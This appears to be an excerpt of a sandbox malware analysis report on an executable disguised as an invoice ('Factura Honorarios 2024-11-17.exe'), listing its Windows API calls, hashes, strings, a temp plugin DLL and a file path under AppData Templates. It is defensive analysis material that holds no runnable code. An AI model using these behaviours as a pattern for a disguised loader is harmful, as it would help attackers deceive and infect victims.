                                                                                                                                  • Opcode Fuzzy Hash: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                                                                                  • Instruction Fuzzy Hash: 0B714371E04229DBEF28CF98C8447ADBBB1FF44305F11806AD456BB291C738AA96DF45
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                                                    • Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                                                                                                    • Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll), ref: 00405359
                                                                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 334405425-0
                                                                                                                                  APIs
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00401BE7
                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AllocFree
                                                                                                                                  • String ID: Call
                                                                                                                                  • API String ID: 3394109436-1824292864
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1913284405.000000006FF41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FF40000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1913259561.000000006FF40000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1913297381.000000006FF43000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1913309870.000000006FF45000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ff40000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1948546556-0
                                                                                                                                  APIs
                                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  APIs
                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$EnableShow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1136574915-0
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                                                    • Part of subcall function 004065EE: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                                                                                    • Part of subcall function 004065EE: wsprintfW.USER32 ref: 00406640
                                                                                                                                    • Part of subcall function 004065EE: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2547128583-0
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                  • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                  • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                                                  • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                  • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,0040595A,?,?,00000000,00405B30,?,?,?,?), ref: 00405D5A
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                  • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                  • Instruction ID: a3d3d340e07fbe3a7a5d47ed685d46f7c513eabc37ca73d627b83f1c605c53fe
                                                                                                                                  • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                  • Instruction Fuzzy Hash: DFD0C972504820ABC6512728EF0C89BBB95DB542717028B35FAA9A22B0DB304C568A98
                                                                                                                                  APIs
                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,0040334C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040583E
                                                                                                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040584C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1375471231-0
                                                                                                                                  • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                  • Instruction ID: bbf35a5bb38483cb45838bf81b7f1c8f5060ebeb43bc13b88216483053fd9792
                                                                                                                                  • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                  • Instruction Fuzzy Hash: 39C04C713156019ADB506F219F08B1B7A54AB60741F15843DA946E10E0DF348465ED2E
                                                                                                                                  APIs
                                                                                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileMove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3562171763-0
                                                                                                                                  • Opcode ID: 5261ed7edd04a14d893c83910459d3c8deec0037bccb67e23753061ef382d847
                                                                                                                                  • Instruction ID: d123e8d396e713de7048fa64f9ea280ab7714f4756ad7edd7a8c63d0e13ac4ca
                                                                                                                                  • Opcode Fuzzy Hash: 5261ed7edd04a14d893c83910459d3c8deec0037bccb67e23753061ef382d847
                                                                                                                                  • Instruction Fuzzy Hash: 16F09031A08510A7DB20ABB54F4DD5F22949B82369B28073BB812B21E1DAFDC54259AE
                                                                                                                                  APIs
                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PrivateProfileStringWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 390214022-0
                                                                                                                                  • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                                                                                  • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                                                                                                                  • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                                                                                  • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032DC,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                  • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                  • Instruction ID: 5c61021ef0a451a09cd551de8c9c857919e5c63ef2f102696365ec0a5e508dbb
                                                                                                                                  • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                  • Instruction Fuzzy Hash: A0E08C3220021AABCF10AF54DC00BEB3B6CFB007A0F004432F955E7080D230EA248BE8
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040330E,00000000,00000000,00403165,?,00000004,00000000,00000000,00000000), ref: 00405E11
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNELBASE(6FF4405C,00000004,00000040,6FF4404C), ref: 6FF429B5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1913284405.000000006FF41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FF40000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ff40000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 0040331F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FilePointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  APIs
                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00403FF4), ref: 00404227
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404C80
                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404C8B
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404CE8
                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404D5E
                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404E99
                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404EB8
                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405088
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00405098
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E9
                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00405237
                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405242
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405249
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                  • String ID: $M$N
                                                                                                                                  • API String ID: 1638840714-813528018
                                                                                                                                  • Opcode ID: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
                                                                                                                                  • Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
                                                                                                                                  • Opcode Fuzzy Hash: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
                                                                                                                                  • Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040473B
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404765
                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404816
                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404821
                                                                                                                                  • lstrcmpiW.KERNEL32(Call,004236E8,00000000,?,?), ref: 00404853
                                                                                                                                  • lstrcatW.KERNEL32(?,Call), ref: 0040485F
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871
                                                                                                                                    • Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1
                                                                                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                                                                                    • Part of subcall function 00406518: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 00404934
                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F
                                                                                                                                    • Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                                                                                    • Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
                                                                                                                                    • Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab$Call$6B
                                                                                                                                  • API String ID: 2624150263-2922200990
                                                                                                                                  • Opcode ID: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
                                                                                                                                  • Instruction ID: 1fca52776cba06a1556b538b397dade1a16f07a9c9d6655049f3c7fe444e155e
                                                                                                                                  • Opcode Fuzzy Hash: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
                                                                                                                                  • Instruction Fuzzy Hash: B4A180F1A00209ABDB11AFA6CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                                                                                                                  APIs
                                                                                                                                  • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab, xrefs: 004021C3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInstance
                                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab
                                                                                                                                  • API String ID: 542301482-4138664628
                                                                                                                                  • Opcode ID: a149058ad8696085432c460d88ec71d3eef099888a8f5696d16856a4a3f09e5f
                                                                                                                                  • Instruction ID: 3f6190fb0288cb4cc2191ecfdaddaa4006c381b8c0a92558cc12242fdf246284
                                                                                                                                  • Opcode Fuzzy Hash: a149058ad8696085432c460d88ec71d3eef099888a8f5696d16856a4a3f09e5f
                                                                                                                                  • Instruction Fuzzy Hash: C9414B71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1974802433-0
                                                                                                                                  • Opcode ID: 3ff8ad76b3b9f153c7fa26eaece9520d2f538018302aa55d80a0268ba0d10728
                                                                                                                                  • Instruction ID: 42b58e9376e2aae4a6b7d1f769ff68ee5b2b2e9610aeafae56754381977d23d8
                                                                                                                                  • Opcode Fuzzy Hash: 3ff8ad76b3b9f153c7fa26eaece9520d2f538018302aa55d80a0268ba0d10728
                                                                                                                                  • Instruction Fuzzy Hash: FCF08271A14104EFDB10EBA4DE499AEB378EF04314F6045BBF505F21E1DBB45D419B2A
                                                                                                                                  APIs
                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404458
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040446C
                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404489
                                                                                                                                  • GetSysColor.USER32(?), ref: 0040449A
                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004044BB
                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404536
                                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040453D
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404568
                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
